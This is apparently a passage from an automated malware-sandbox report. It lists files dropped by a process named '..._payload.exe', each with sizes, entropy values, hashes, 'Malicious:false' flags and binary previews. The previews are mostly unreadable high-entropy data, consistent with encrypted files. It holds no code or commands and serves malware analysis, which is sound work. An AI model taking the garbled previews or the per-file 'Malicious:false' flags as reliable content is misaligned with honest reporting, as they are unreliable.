                                                                                                Entropy (8bit):7.890416199485227
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:pheUl2DGQnDVh8YlCPIdsxMOj7dcVNAoqxWwPBiKfTHLD:PhlirBh8IRQMOj5Cc3FfTH
                                                                                                MD5:E6ED8B2080511B463601AD5E596065F8
                                                                                                SHA1:0FD1D7820D2C1C0E37688856AB1C9C6C9ABF5C84
                                                                                                SHA-256:FE81E1F59A279EF33ABECD0A11ECEAB4970D41801A4672FFD8D434249416EDFE
                                                                                                SHA-512:B8001CBCF27A45643CD99685FFBF65428AE0049987799F36C0A5AE02366610FB0F8E8FD6ACC4F03B442D86EA09E373A6F338A299530A0AC064E1F2E943A6280B
                                                                                                Malicious:false
                                                                                                Preview:.<?......JPw.2.].&>.........}pC./..FYR..a.0<).G.....I.....o..7u...G.!...H.fX.7.;|.!.......:R?;K.(jU.EW.....k.....F...]....D1/&.{..f"9.A(..K.d..V....Z.`.h...._y.h..*..@..pU..p$..XH.A.~.9......f...zP.zc.-...>..A....K...~.Y?.+.z...MU.*..r...z.G]p.J.O@.'.s....'7~...h.a.&n.A.!*.s..X?....%......2.....L..+.<...$,.Q2.Z........W......So.E..D.z.............'R.).K|.../.G.#+.qb\.OU.......k..].3.b..s..?$....O......_.`.4(.b...y.._..l.r..~.I...F.............4.........^\........^<.....z..D:..}...5..j7.4.......^..../..T|f..{,..2.*y.,..u.6e..n...[?..<...J.t.4..Q.)..,.c. S;.@.l.}:*X........kXl..;.=.4h>.5...a......].....r. ."...4..P.9k..I..;..;[$..e..=..).r.0e......G...(I...[)j...0.....HG.D.a......j./+}...z...).......}6...R........{....R..> Uz.x/.......)..NwP.t.s..+........n's..`..MQB.....#bQ.hQe[4X4.V.+..9...3.z........f(...y..&5.,..q.[......B........f.]C~a.g.......KF.1........cAv.NV.t.....8.rm..:.,..F...I..%\|..9.{..T.4..|u].P=6W..A'.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1583
                                                                                                Entropy (8bit):7.875067147680874
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:CAn8mEYL1P29uYjlzNxd68bfCHRxHppt/oTjk5vIh8LD:p84he9uYhzg8bK/1onkFr
                                                                                                MD5:C8C9095ABC0F65D56A49CC3000B650F4
                                                                                                SHA1:83CCF19691F6E76580AB1C9BFAE4D16BB8079A3C
                                                                                                SHA-256:631A042F511CFBDBB1BDE2B4ED95E779FFA3F6757A72DB6F36F23A2C14E16BF4
                                                                                                SHA-512:877FEC3212F8A3163E4060534A34150CB4C7F534DEAD204D13203D4DF7109D48C2BC5560E1C29DAB8920CEE4F070A2158323F1BD6DE474007105B156E5ACD56C
                                                                                                Malicious:false
                                                                                                Preview:<?xml..B...X...+.h ^tp.cr.....p.|.=........z.s*.{Y.0.I.......n......AF...L....:.....Dy.x...M.M~.c..h).....[Vy8D."...kl..S....QENt[..D<.......L......].9`.....I].o..7Y.P<.y.:..^5..c..#..w......Zl.yz.!c..h..[S......*: k=%.Zn.-.u....WJ.....eus.a.j....3...6....._O.0K..Yd..s.tqH.8....J.....*6.Kb..\.o..^"B.h..=.EA..'...zha..C.Q.H....Y8..c...Ze#<`T.j..*h'.;pM.S.zm.......w...[nBh.!.;J.......58g)..>b.r....z..m.$.}V...\-Q.J./..$u....f...<O._..=...j...g...A.O#.\..V.UY..f..>G.*..a.9c.....C..?.......f..KZj9...c.....a1~.i>....T.?g.. lY.a_$..#I..n...@....%V..`.&&./.?...............Y.H.V..Q.m;{0M.TVapr...8...~.v....c!.....3k..j..p...;...D7wa....0.P*.....c.^#=........iJ...DK.9@...0z....Vc.....{t.......vX..p$?..b|M.Z.p..E....r.......9...1WV.3.....h...j...I.|..v..dk.#A3.......xn.....yb...6%O.E6O.k..!.......hG.C....Z.>..I........w..C..>.....<(....r...i....|...Q+.:.....&r.B...U.B.z....\..w...#....[....o.+-.-.NLp,TZ.F...........&..*.,..'..h.pE...S....>0.$m...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1928
                                                                                                Entropy (8bit):7.896958751997722
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:fvSchwM+4zsHRIuzGsSRBwB/HpRTeGDZe6OYH1O2GbvLEHLD:fvSNH27iPpR/1b02G0
                                                                                                MD5:A4630683FB8EF60A0B808AE86F78E0E9
                                                                                                SHA1:B452E913297573CB66206D529C495E69DDD189ED
                                                                                                SHA-256:A5112EA8716F70EEF2AA34451E6C8767A4C49AB5FC0A7AAE6A1997DD4F0F2727
                                                                                                SHA-512:F8547BDD80F97F78D7C88A614D0A1642DB8F7CB298DB488511EB3209D09C612321688CC28CA7D855352A59CEE9BBEF148AE24A55060B9F1EA25D7EB92F48A85E
                                                                                                Malicious:false
                                                                                                Preview:<?xml..y^....+.M.2\.B..r..]-G(.?|".>_/*.hU.....g.....<;..j.C..\.u...Y>.|..J..c._.z.g..:.j..?.O.7}..m^k. ..Gim.d.b...e9.....#.AG.....~...|......rA..T.}V....7EPG.(.....i...c.#....]........P.f.>.....<...b.....3...%....,;..._....y_b. ..1M.6,..o......lkU......D....0...""..E.l.t..}..IZ...1p....{...cs.Zh...1.a...ev...~Y.y../(...(..8..Z.2d.S.Yv.gj[.0....Y..*.q.'.x3.v-.bt....=..@-c.s...!..a.*6.u..b...2./J........6..z.ixxO.$(.`!...0O....f*k..W...=."c.}_.*.......}.........kS..5j.b.,....L$...%..V.?.Z.q\`I.j?...s.[g..a.nSf..fc..Xu*>W...A...A.....U....y......*Hn..l.ZN......V......../.c.q...UV..k.'xa.MX...2A...%0/.I...6...H!@VyTa..&....U.......O}.8..-..\...P&Z..2<...C.WQ.*....V.p........m^I...UH.v.Ea*w...A.Y..Bu\..0.v...dK....m.J.I7......6..\.........8..U..-..6.P....MF.z.8...Zi...I_..]..jg.k..4..a.Kr.b...0.#7...m....9..y-w........s..s...fn.v.+V..|?#.EV..~.....:.{..(....r.6..E'.i...{yah...i..}...Z.N..VE.Y.]..h.'-z....&..I....E......-....D.......$.j.!$.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1387
                                                                                                Entropy (8bit):7.822721538068439
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:t8sYyzfJIBjhxnYGjdgZQAbi/AEuhhzy+lFb3MCfWoHxiZ+RnkRC4iulddjygx3X:6sYUxIBbnYGBIZi/ATry0x3/+c0wRnqf
                                                                                                MD5:5E65EADFA31C2126E976B85EF0CBB42D
                                                                                                SHA1:B36C3D6EEE346A47D087058211AC29AFDE70CA4A
                                                                                                SHA-256:2CF77458BB48045F4898A8A97ECA9B3EA0F4002CD26471F04080689A2F4B897E
                                                                                                SHA-512:5CD72723508C57C2D8CB44DD80B54CC339678221E993A6615FAB122B1901C7990789CDCED5A4A6C2C9DE3E264A2F3B423B625D8A659CB7CCBBE257537E07134D
                                                                                                Malicious:false
                                                                                                Preview:<?xml...\.....`iU5Nd.M1...$..m....D..LRf..!s.!\"V.)..YV...U8.o.P..r}.[4.N.D..GY..9..L}.sv...5B...?)^6.q.3R.Vb...=..d....I..g.e.X^n../?..fqi8......b..[h.....G.S.P.&...F{'.{...'.{.H...fU.#.R....}).z..A[...Y.j..O...2.|.m....4.:.S..)~..P.#........s..BL.<.../...1........1s........'b...q-vAv.V8...Zx.........&..1......_...hy.......QI.{D@c!.......c...St.j.l.59.....$C.H.6.b......G.0..2.4z..wW..O-FA.W.a>...Lwj....`...Q...4.X.({N.D...B|..a.1....m.....8...V..xc.ajU*._D..[$...V.TL}..Z......Pl...1:.^.....4..S.A.....V.....#*5..k...K.M.....U.$...............L:.ZsK...S.....?.$...].EUs...XL..6.o&..D..+..5(.D-..@..J<f.^.-..5(...Te.]I.E.~..'P..Q<v..\6.......B.!..X_.......M..$..qz..k.....|...$3..X.2zMBDK.=.5....\.^..:_..'.G.~....oYi......&~H.?'.s`.:nrS....&FJ6S.e.S.k..3.3..F...FR`....'...C..m\..@."..<...T....JZ\D.E.......G&7.`.e....W...mk.......k*.V...e2...i.pt8...JE......?.~g...^...&a|......2.0K.HS..d...Mu.L.kq.IW...y..$....M..z.[.G..C.......x...V
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3024
                                                                                                Entropy (8bit):7.934759609339633
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:d/d/+YblQO9Y7RRrICXJ39Xcxdq6zq7YltuGiIhmTniIDISeqiqUDu+XzsVUag9J:pZblQKgrnDd6zjiDTiIDIXH9sa/Ua
                                                                                                MD5:D72D203BE65A9E9CA22D767B10FE3144
                                                                                                SHA1:7D7B45EDBDEECD1B32E3B2FF3B1921A59CD66178
                                                                                                SHA-256:04651F2E98143BEF523438F8281D9F3BA3396DAD68A6A2D0115BD9159CB25EB2
                                                                                                SHA-512:06FF9B1C63698DEE2C00FA66D2872A06CEB9BBE304F8C6EC4CB0CE20F38BF802AECAF28E400CC5139C19F0209D482A2E4060E2FB55F3BF852462CBBA3A04B805
                                                                                                Malicious:false
                                                                                                Preview:<?xml.].7.S=j..u_.3.|)E....8.1...\!._.....#`dFv..:.Q....C..r..[...b.;.2...pN...aA'..KZ...zE;.177b.N.....6...Jy....A6$R...;...(.....v....../..$...I.;...4..WbD.c..f......*.z..H..z.'..V7.v.~5L.g..3-..>M....w.....^e...&....n[..?2Jf..Sh1 5_h..q....z............o.*1r./....,...#.K.k.@.....Q...3.W..A..~.7.u_..w.ZL...../..,.M..S..D'..~......}. .M.+...X..~&.....g.0...........C..>{9..l p/..^c{f.:......M.....6..k...>..)....X..|..].t-.].f.h.G...m1.......:....|$...+..Q .X.._0.on5....<./...F..........u.\&H(...9.....g..+....A.~....6.qO....$,.aJ.h..Ns...g...fH..q...t.I..:..S.......$....AoF..F......!!l.....O...y......c....*{.I.S.B..X!.MZ..KH.E...H<.2.M.9.TJ....Ot.)...=.#P.....-.>.s.......9%w7.kp,..T......nR<.O...L......d..Y?[#.Ql.ls....k...$.g....N..T........B.. .=....xk.:2zu......@..<3.v..7I.....Z..o.e.....y...@...O..`..hE.T.w.U...$..m..Wwr>..&#A.V..]..K....\:....`7.^...g.^..W..:.`....=L........p?..+.q..5U...{.of.NK.5......C+......|lx....:E.#.A..nRm\m=...kr
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1675
                                                                                                Entropy (8bit):7.887338711130124
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wnOOIRe123zQSORhPlgXzZSDOxT8glFvzZo+DFzgHQqrqTNrvCnd1q4bRahCx3bD:wnO/e12Uhj0dtO+tgHQqu9Od1Xe2LD
                                                                                                MD5:E312E8A95B3689DEEC43DE6E7126AE8F
                                                                                                SHA1:DA81C3FC06EDA465885B76BE06CF3D55F5C2AF9C
                                                                                                SHA-256:F13DB79169EE51C0DD45969A619C52648318393CA50794E85F02E27111A2345E
                                                                                                SHA-512:6544C9A86DF8F4092F15C2834829061326BB9D6D8D723C86339B034AF73D82C823F11AC5E55C4E20C06FEA2F7DE81E7ECE5202CD3C6DE05A362BA61EDFCFEE46
                                                                                                Malicious:false
                                                                                                Preview:<?xmlM#!. 7...r.....eUR.-.n/&.A`...-....]3{.ni(...0...o.{;.;E*.g..I...0..6.t.....,.Z]..#K...y.E.t...2..X...c.P...:B.......*.....?.....C.. `........wG.1.[$a..L.c.>....Q..pl.#DX$5v?....:?.........}M..Me.f.....P.&..[u.0!DK`....d.@.....S.........X.]o>0...Lhs.f..y.nBJ...2....U....{..5..4q.....sJ.Z.NG..$M..9...Vj...c2.p..H.I.|..0.......,WA...Y.."m14...^*.qJ,j.6.-.bN.b...vv`...6...'Oi............t....P.aR..?t.E......Q'..P..2......$.K.......,.X..4....P.@.r7.v...|..~...I9..........q.nPZ..X......9.IC0...!.Q.z..Z,^.(..Lm>$.......R....T..X......=2.1...o....q.....w^.@.p..i4..8.....W..ZW.......i..W....F.jA@y....C.........t.H...g.E..%.....o.3..Rgp...U? .......$. ..l..f5..U..E.H.6....Q*.D:...4.o..1.,Ta.....,.C.w.u..o...mu.3...q.\...=b2l.u9.../..zu..F..qQ...d*...f<..,.}..........?.....m..!..V.S..|...[.0c]..LP...!J-..%n...Rc7.P....& !Yo....%ed.O.M.......\r-<.LJ..>.<8...5.@.Q....,4....a..{....TVZ......N........2Zf.f...su...Lq..9......?..g.]?...).Swokj.y
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2113
                                                                                                Entropy (8bit):7.909423016796308
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:AlAoDFK99fAZxUrW2iKkbxJ/AVnH3KdEhIQKpcZTVfTLD:vz9S8W24n4nH3ldVT
                                                                                                MD5:A887754AC98BE17EA1C714851904DA39
                                                                                                SHA1:6212AD31FC2DD5A921CFCD91734E8C1C7C7DA120
                                                                                                SHA-256:111331AAADD5BF707C3FFC5F6DC394E60C1BB102BAC08BC31833D0BB5971A2CA
                                                                                                SHA-512:75AB2CA208C47783CC97E94E18519D17B3AB536CF46A671D5551117CDCF5420503B41C3917B8E0C4021232B398E98991EB06A5DF72C4A2BF9AEB61D4414E9911
                                                                                                Malicious:false
                                                                                                Preview:<?xml}[...Y)bq.3./...tug.+.1PX'Q..]lPE$.7.5.~.....S.....l..jx..^...P.z.pnE\I..+....qb.(H#.x.m...........).....x."..@..>.~D.l.H.*.m.W..&.).e.>A...._f.$....L~...z...3..k{..#..B.3\.w.'N.bd!....*.B.UI....~.i..vn..U.....m._.0v....f..{.k)gf.X.ccZ.....4...HO..x.....<.....~..}V..v..G.g...i..h.)..6.J?r..;AsI..9.hNW....2......d.2.....L.X(.3G.....L=Z.>.......1-.....6"q.>./7..ezs.P....D.=.y...>....w.p......k.L>....'.y......w....O.6..&Z..A....*qS.....(?f>....@\..M.....D..I.....Ra.Q,.........P...;..Ao6...;&.&..P.]....B.W.-.g..L.>.O..i...x.e"..V.].e.f..b,....7n2.#J+...=77'2H. H....udc.O.!{8......C~..%!j.Cj.{....qU\..}.a.A......Oi`r..f.....[./..&.,....:F_J..x.g|SY_..=..d.....gd4..V.......'.S(.....@..]w.d.....G=.t..`r.g.D...........1..Mk..y.....D...g.......l.Wx..."..+....G._...T^.....l.av...`. ..g..k.a...7.....U..E.(...3...fX..7^............^.M...<jS.....q.5a......tM>..TW..n../..g.`.....[km..|3.)......<$;.d......x..w(3d\V..,...OL..N.'.3.`e...].
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):813
                                                                                                Entropy (8bit):7.720192247275587
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QFMP2tRi/1sYP9O2MaYWUItLP4mdMXkoCOCADOvF1x3bD:Qg2e/1sYOlBsJ/oCO5qvtLD
                                                                                                MD5:1B184DD82C3691ACD6B465F9CEC273F9
                                                                                                SHA1:3D047892B1F4C3995E83E1AE717FEA95D1606194
                                                                                                SHA-256:CC7CD426DF74B8BEA987ECC314F61732998AF2DA4BA73F927575A2290FE6F7A9
                                                                                                SHA-512:CCA7E5E0E86259627A1010C2BC1B1E71B71390230D7ED83BD9BC756E3E41173D05E57BC8B5625825E06970A6579FDA20BBE4295F8B35C5ACA25D7743FDEAF2EC
                                                                                                Malicious:false
                                                                                                Preview:<?xmlm.2.A ......Yi.1W.g..z..].....`.Q..."..Y{F.V.=..Z..5..;...m.#....P..?.~.......-.j.=..x.al7~.[.~..h.).o.1.D.=..Q.J..Z...EG. ..!i.ds=e.....|}...`A.1.j.#....q....jz.{t.k.Zb.z.h..(.f..I..._...m...O.........~uV..If....F...%N.Z..^...hN..4...AC.K..v%.+......r7O@.v.....3.R....I....B....*R...kV...].......].............*..I$.....G...X=.H"..>...(.^./f..u.......E1....@G..../5k......A..~...z.B"..5...u&*P.s.l'.F.^=.d...i..'./....Y{..x....At..W.r..K...-..S,u....~o..W|...6.6.6W.@?..c.f.....@......C..;<$....x.@.,#......&.T.^zc..;.)J....9j.K`........1....U.,..B)..C..AO~V[.ztOv:T...3.b.*.I..[B#...wnb..L..Tp.t.......@c.W_....=6iQ\. .r=...=....0T.O.!..V....:..!.9}..~3.S...^L..k......a.P......ZOpI.f.n:...B..bBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2070
                                                                                                Entropy (8bit):7.916506306972797
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:f/06hQ7Lw1AxD7MiKds+DVopiPyaSn25r8xhKLD:UQQ7E1Ax6se2aan2iK
                                                                                                MD5:E2C7D97B55FE27B44117FC1A618FB3C4
                                                                                                SHA1:D452C302A990215F4AA507BAA652E85837B9A6FF
                                                                                                SHA-256:9BE0D26A7CFCF6A8C7C5B80400E38A3EEE29F54DE85CCBA12797A79F881F87EC
                                                                                                SHA-512:257B449E5E40D544E62B5CCB9C606387DA18D85696479A0853CD7D01FB0886551304A428D986F41572ACF61C7B1E7E7B3DDAF3F47F096C75E7850407AB77017B
                                                                                                Malicious:false
                                                                                                Preview:<?xml.e\VBK.....vOG..w.S.IX....p..R..'.L..y,.....q.......@..9'.,pY..jDI.?....zd..2`(D..r. N...H.........d.Q..Hh.8.$E.j..9f=.B...4*.Ns.9.._..?.9.$(.>(..%,o...Y1.@.[.M.#%,+.L+G.\F`w..*s.ee...t...?..Ro.*...Pz..f.....c.7....91N..+..O....?.|D. -U...K.5.g.]... %.....^N..SS.S.....Ys...~.%....5_...A^i..c..@..QT.fc&{.19..BD. .C..L.oQINr.L:.]$\!.-.d*Z.."..i}.......A.x9X.%.w....^..K|>..V&...Q...i....K..........%P..x.X....FV......):9!.m&....Ca..k.....lo.3.T...6$......\..h....m...C...+..{..M.......E..)|..K..... .@@.S.F...{V....ub@.....7...g`.....$......3..:~...f<...d?[.............i.....[.v..5..^B. .6.0I.Bk.y..6._....A.1BP.`.Ie..pi.x....'./.{m3$......a..)3.M..1...a&.M>(.A...d.:..|.T.6.K-'......d..jx......0.(7./..N.......R:..K..,.W..~.3..?.V...".....s..M....fM=o....Y.*..e...\..G%h8}.....d!.`SU.S1*..>^=...'.../..IP.5~.,8.c......Su.i....>.J...Q#...4j..1..7.....'.1......;.U................\..,*...w.Hs.E.!O.1.u(w.y}.".ps;...*.f....gEw3.....a{Y4.8.F...Lr
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):789
                                                                                                Entropy (8bit):7.707500169080904
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:y8+0oltRGiyr+96AvF3ywICpGdBEGzdOu/x0w3H4gcmq+8wSkXdXNUwgJc3cii9a:yCnAxRGdlB90+xXAwS4Uwx3bD
                                                                                                MD5:18742DF68A87D537AA6EA9873DBA75D2
                                                                                                SHA1:D85F83CDF9FC7764B89F23AB09CBA790F3032F07
                                                                                                SHA-256:2D3BEFA317B1F13158FD52EFCBCF367DE61F121DFBEC7E70219DE3F742F9A25E
                                                                                                SHA-512:67BEC3357062C3A61C1D9B24A02B2865B7AA3F7A6772F51E5C250FEB665C0B341CD367EBF1A6835960CB6A626EA5BF79558207CBBE06CFD4DF171564199F69CE
                                                                                                Malicious:false
                                                                                                Preview:<?xml...'........LFa...g...ea.FX...S..TG|.G..)bT.=<....V-..z...l.Q9].d.2..`.cre.e...|...T......P...A.._..H.xd....9....NO;...p`...../.B.Lq.%.H...1......0wK]G..WEH(p.?.....*..8..M..K...w.UF.?`.........'D.n...D.}.a.-I..e.>..c.....;.U...p...)..mH......ox.`..>....,"..7...nY.]b.7$...=Ol....Np5x.35.@...%.0.=....B.K{f..|.n....rk...O'......G..$J..#l..f6SfeJ?.y.lhxx.......F......z..Smkr.J..#...Y./.~...I....*HAl..a.....e..<...991:....=...l.0?....pdF..e...6.6^...Q|_7X..2.#..G=....IRl.E9Z....+.U.........5......O.gH....F.)....\......'~7.....X.C.A...!....s$Zp. .|N........(o....H..Y..O...K......r.ymT7.z....-..+r....T....v.i.;d5[.6...a...D.1XB8...AjhC..y&.3%....@...%qH.............-.F...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3017
                                                                                                Entropy (8bit):7.929209558031616
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:PPjszXynfRkgovEEkkDFTeKYUGq/f9qV4bJE2LAvbtGSrM7nQlaymK5Km7nMA+LC:PY+p1l5kD40l39Gia5pBhT57nMAcTsr
                                                                                                MD5:1929FC983DB89741AFE77EA6EA0D8B37
                                                                                                SHA1:37850400B3B7FAFC407734CDD43790C81965A527
                                                                                                SHA-256:71A0B9F583757AE3C6E19AE7222BFFB1383ACBBDC24AF6C668201486A56C1078
                                                                                                SHA-512:02C96D6312C9759D1B5C00583875C40D41C4F840B32C61B9FC65556B35C074922D3A212F45C6EA634267AF1A735F0E23DDABA86EEC7B9E27A38A1C4947D23288
                                                                                                Malicious:false
                                                                                                Preview:<?xmlr..9[,..y...<..W....e1....<.]....c.....V........8.A.71..........sJp.j...0Y*z.w.....-BE.]d.[.[{c..#.4\!........./.Y....t.'......0.~.b.....".u.H..u...... .C...+..Z[.?CG0.....l..f.o...<...*@.6...&......6..*.h.9..]...`.$...9.>.tU........^.}..[U..A.oj.UA..|%i-b..Y.........._.[..9..s.{w.B2M..e........!B.v_6.13.a......._8X.._.o....'....H..)...%...|.x.....B.G.n.y..8Z>].E#t...j.-*..Q.8...\.1..Kf..dP........Q...W.C&.c....$|.. D'.X5...x......B..7...x.O7f...>.'.d.....8....L{...m%.u...1.y8..5..].a....T.+.. ~c....1!.R..D.Q....&....'v.S..s.$S...F....M."`..B......,'H#,[U..>8.Q.P.oIY.&........uQ.Y..d.u..05.7Mc.3..V.....}....W=kS..CG.H..G....#~.."...T7Ol.L?..3h..% D' .@...k..,aq$y.jw........q..p..<s....K....+...W.../U.Ll...Q...;....Xs......b.............W.....S*.8...V..T..l.i{..2..........+@.....(vi....Jp.}..jz.h.`..EjQ.g`.}L..n..s.X.X`.......H..?.W.k3.$P.%.W8C...kv`.n.13..i..'o.5..:,....pi3'^v^mQ..y<x.)w8{D....7..`...w.`.r.+Q.....(.j...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3017
                                                                                                Entropy (8bit):7.930480151319592
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:hTPFIJiTDU6Rlo0fGyIkyhn1rN+dyqlSq3x8FS8Ps8TtapbKcvTbgxsLD:hTPKJik6RPChv+dKq3OapbDTbgG
                                                                                                MD5:3EAA186C6C11D2D0889413B6AAC7E759
                                                                                                SHA1:DA86456B886DC29B6800BD2A4AFFE27F1C10D4FC
                                                                                                SHA-256:17660C2BD7D77E0A44CDC1286A2CA8F423AEF785F0B75D34528DBF6F0E07ACD4
                                                                                                SHA-512:363B69433AA4E2B9253DBB72A41DC37B83D3FE8067F451267509EAE7BBCD21E11CDFD59AFDD9F6721507DEB8FB78C50013BE7EAD2B52B657FAA4FEAF4EE3EC93
                                                                                                Malicious:false
                                                                                                Preview:<?xml.vs...\..%sH ."z2.B.....>..$).{..!C.!.Wcj..yuLK+..z.....\..H..dvMq.2....,|[..E6.Hxxv.`}.I.TbGC....K.tv..v..h....*&>.I..k..;?.*q....^.#;..7.F...M.m..o.;.).O[d..s.n.K.w....\8..ShC...`...I.?)R'6.z.. .&.Q...mnv.%q.6L}a..df..W.3:.1..0.5k.rE\.`_.<.dS.{...O.........-*....o.5.a..5..5h....S....x..pO'..Zf.....?...]..-.Z.w..3....U...#....9{..v..1...`o.mg.,d...+E ...;F{!.Q...S....T.5+\...F.......|.Z...:.c...Kc.C.......>AP...=r..d...4v-d.M..O-p....TJ16/*...`_.K.....;Dy`P..F.nR[.gu<4\.>.)!.8..3O......).&..{`*mqp.%..#hI....g......E...(....qL*?.!.?.....(.u.P6....a...-b..'....R.@.......Jc9.~.{...d;b.Z.....H......da.+:.m.D.V.8...B.h"..0/a#g{....VZ....X[..8]M.>..<3...c.c.(.+..I.T.@B..\.....Uq......(^.u..G........"We......IN.5.}P.C.MQ........?h.z.w..4..9..&.f....X~.k.....~)o..N.._..lf.A..`)ig.?fW.....Z..O...._*z..p.^_....|P.,X..;........Y..z....U.A...kk5Q.qC...`..i$?..../.r.d.*..W......1}.........NZ."..(..VX..O..:....P...P..0}.[.8.&}^...s....8k;..i\'<.Q.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4639
                                                                                                Entropy (8bit):7.961432742841103
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:hkBzs+q1eW1An8cG7Gj1nkYZKMa6a0RXcxaOmsyCD/Zwpd674zBMxx:uRQ1ewAPBbAMaSsarYKpr2
                                                                                                MD5:AB9BAF3CA744B1E4D0D72F2D7A00B5F3
                                                                                                SHA1:34366D79C72A1FC7FAA874F2158DFE52EBC9734D
                                                                                                SHA-256:E7410A3BA2E7DF112F3B41DA446D710697A343156592F7F4DA5F08EAED5C76CE
                                                                                                SHA-512:4B4F6D60511B5CEED82F1ED97226ACF202F933D751AAACF30F9BD1C6B7863242B5897CE018327FE919EFAE9F0367027EFDAA8AED60E29BD467BD0D54E9248ADC
                                                                                                Malicious:false
                                                                                                Preview:<?xml...Ca.E..N:..........rW..#.......9..:<......&.4....t.%C.WE...4..,3.G.....l.r.............}wD.fh....$..s\0:Z...*Y..V5~...~Z@..y.y.....Y...n...fA.{|..S....yM..<..k^&.|..x.(5u.E.....lg./.R...A4I...0...%...U....i.@s..Mp....e.C:....O..hw./>...&..;....3...s.D...J.Pp..X...g.%p.g.....W...n...;..+,..I...x..&8....4..+..S.}I.....d...[..........P.l: S~8.@.`....n.d.a(..@.....$..k.m."q....):.}.N.B...-/....J.eu.z...S.F.,../.w$.%.,/Lt....|....Z..l....?-H....f.....x...Z....MR...1.\"...%Q...r ...cD...:F..s......w..g...Py....!.}....1.$.._....)x.A.)..~.....U|u,*.VY6b../i..Y...x.W%P2.h..:D..<fU.... t......t...e.....;.?......<....M..1...;.O...".=.ud.@.....H...8..3..%lD3.g..s..?.C&...c.....,N\.~$Z..8z.9C96.KX..i....Pe.......Jc.$..N.....0.`.|..'%.{..?.>.{....d....b.S.R.#..t......G..O.m.+*?.E.w...N..{...!~'.1p.q.......w9i........,H...3...W.}.B&.'.A~...>.U.&..........D|..:..3.............?.{......mUE2T.h....)..>..}....@m.+....(.....[&.._X=6.......+&J..Zx..eB.X.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1329
                                                                                                Entropy (8bit):7.842279435187829
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oS+83XDNiQbu7DBreGtq1SwsfMqE4CIa8U8uH+tkvJ85pSx3bD:V+qKBreGtqwwsEqBbamuHvJ8KLD
                                                                                                MD5:E9D1A0380E2407D7483C008C003219E2
                                                                                                SHA1:108C9E3AE94CCC297CE6836EA5236ACAACCB069C
                                                                                                SHA-256:853A1B41005D9BF13E310BDB7DB92F5825300E8A6E713D4EB432B0E4CEEA5EE0
                                                                                                SHA-512:61E804B278CC5CB295A64953DB860623C82D467A5868A44AEFBA3C0ED3C9FAAB77C5E7B9D9FCA9E4C0A6BF4EE6095111170C4CE0591A2346D9C920A01E69A4ED
                                                                                                Malicious:false
